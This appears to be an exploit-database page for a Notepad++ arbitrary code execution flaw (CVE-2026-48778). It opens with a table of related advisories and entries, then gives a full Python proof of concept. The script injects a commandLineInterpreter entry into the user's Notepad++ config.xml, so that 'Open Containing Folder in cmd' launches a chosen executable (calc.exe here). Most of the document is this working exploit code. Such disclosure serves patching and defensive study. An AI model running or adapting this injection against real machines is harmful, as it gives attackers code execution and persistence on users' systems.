| Title | Published | Views | Family |
|---|---|---|---|
| Notepad-8.9.6-PoC | 28 May 2026 22:25 | – | githubexploit |
| Exploit for CVE-2026-48778 | 30 May 2026 17:49 | – | githubexploit |
| CVE-2026-48770 | 28 May 2026 12:51 | – | circl |
| CVE-2026-48778 | 28 May 2026 12:51 | – | circl |
| CVE-2026-48800 | 28 May 2026 12:51 | – | circl |
| Notepad++ security vulnerabilities | 30 May 2026 00:00 | – | cnnvd |
| CVE-2026-48778 | 28 May 2026 12:51 | – | cve |
| Notepad++ < 8.9.6.1 Multiple Vulnerabilities | 4 Jun 2026 00:00 | – | nessus |
| Notepad++ 8.9.6 Arbitrary Code Execution | 1 Jun 2026 00:00 | – | packetstorm |
| PT-2026-44400 | 26 May 2026 00:00 | – | ptsecurity |
# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution
# Date: 2026-05-30
# Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48778
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9
#
# Description:
# Notepad++ reads <GUIConfig name="commandLineInterpreter"> from config.xml without
# validation and passes it to ShellExecute when "Open Containing Folder in cmd" is
# triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an
# arbitrary executable path, resulting in code execution under the current user context.
# In the following script, `calc.exe` has been used to demonstrate this vulnerability.
import os
import sys

# os.environ[...] would raise KeyError before the check below could run; use .get()
appdata = os.environ.get("APPDATA")
if not appdata:
    print("[!] APPDATA environment variable not found, exiting..")
    sys.exit(1)

config_path = os.path.join(appdata, "Notepad++", "config.xml")
if os.path.exists(config_path):
    print("[+] Found config.xml at", config_path)
else:
    print("[!] config.xml not found. Ensure Notepad++ is installed and has been launched at least once.")
    sys.exit(1)

with open(config_path, 'r') as x:
    s = x.readlines()

# The value of this setting is handed to ShellExecute unvalidated (see description above)
payload = '<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n'
injected = False
for num, i in enumerate(s):
    if '<GUIConfig name="commandLineInterpreter">' in i:
        print("[!] Injecting payload..")
        s[num] = payload          # setting already present: overwrite the line
        injected = True
        break
    elif "</GUIConfigs>" in i:
        print("[!] Injecting payload..")
        s.insert(num, payload)    # setting absent: add it before the closing tag
        injected = True
        break

if not injected:
    print("[!] Payload injection failed.")
    sys.exit(1)

with open(config_path, 'w') as y:
    y.writelines(s)

print("[+] Payload injected successfully!")
print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd")
print("[+] Calc.exe will launch instead of cmd.")
print("end")